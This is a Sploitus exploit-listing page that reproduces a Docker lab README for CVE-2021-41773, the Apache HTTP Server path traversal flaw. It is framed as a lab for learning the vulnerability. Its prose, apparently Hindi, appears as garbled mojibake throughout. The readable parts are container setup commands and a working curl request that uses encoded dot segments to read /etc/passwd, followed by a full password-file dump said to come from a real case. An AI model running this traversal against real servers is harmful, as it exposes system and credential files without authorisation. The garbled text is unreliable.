Sploitus

Exploit for cve-2021-41773-docker-lab

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN71 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TWSEPTIAN-CVE-2021-41773-DOCKER-LAB
# рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ CVE-2021-41773

CVE-2021-41773 рдХреЗ рд╕рд╛рде рдЦреЗрд▓рдиреЗ/рд╕реАрдЦрдиреЗ рдХреЗ рд▓рд┐рдП рдХрдВрдЯреЗрдирд░ рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛

рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдХрдЯреАрдХрд░рдг:

root@kitploit:~
    
    
    $ docker build -t apache-default default_conf
    $ docker run -dit --name apache-app -p 81:80 apache-default
    

PoC

root@kitploit:~
    
    
    curl -s --path-as-is "http://iptarget:80/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
    

рдЖрдЙрдЯрдкреБрдЯ

**рдиреЛрдЯ:** рдЖрдЙрдЯрдкреБрдЯ рдПрдХ рд╡рд╛рд╕реНрддрд╡рд┐рдХ рдорд╛рдорд▓реЗ рд╕реЗ рдЖрддрд╛ рд╣реИред

root@kitploit:~
    
    
    curl -s --path-as-is "http://iptarget:80/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
    dbus:x:81:81:System message bus:/:/sbin/nologin
    polkitd:x:999:998:User for polkitd:/:/sbin/nologin
    rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
    nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    postfix:x:89:89::/var/spool/postfix:/sbin/nologin
    chrony:x:998:995::/var/lib/chrony:/sbin/nologin
    centos:x:1000:1000:Cloud User:/home/centos:/bin/bash
    mysql:x:997:994:MySQL server:/var/lib/mysql:/sbin/nologin
    [REDACTED]
    

RCE (CGI рд╕рдХреНрд╖рдо):

root@kitploit:~
    
    
    $ docker build -t apache-cgi cgi_mod_enable
    $ docker run -dit --name apache-lab -p 82:80 apache-cgi
    

рд╕рдВрджрд░реНрдн

  * CVE-2021-41773: рдЕрдкрд╛рдЪреЗ HTTP рд╕рд░реНрд╡рд░ рдореЗрдВ рд╢реЛрд╖рд┐рдд рдкрд╛рде рдЯреНрд░реИрд╡рд░реНрд╕рд▓ рдЬрд╝реАрд░реЛ-рдбреЗ
  * рдЕрдкрд╛рдЪреЗ HTTP рд╕рд░реНрд╡рд░ CVE-2021-41773 рд╡рд╛рд╕реНрддрд╡рд┐рдХ рджреБрдирд┐рдпрд╛ рдореЗрдВ рд╢реЛрд╖рд┐рдд
  * CVE-2021-42013: рдЕрдкрд╛рдЪреЗ HTTP рд╕рд░реНрд╡рд░ 2.4.49 рдФрд░ 2.4.50 рдореЗрдВ рдкрд╛рде рдЯреНрд░реИрд╡рд░реНрд╕рд▓ рдФрд░ рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди (CVE-2021-41773 рдХрд╛ рдЕрдкреВрд░реНрдг рд╕рдорд╛рдзрд╛рди)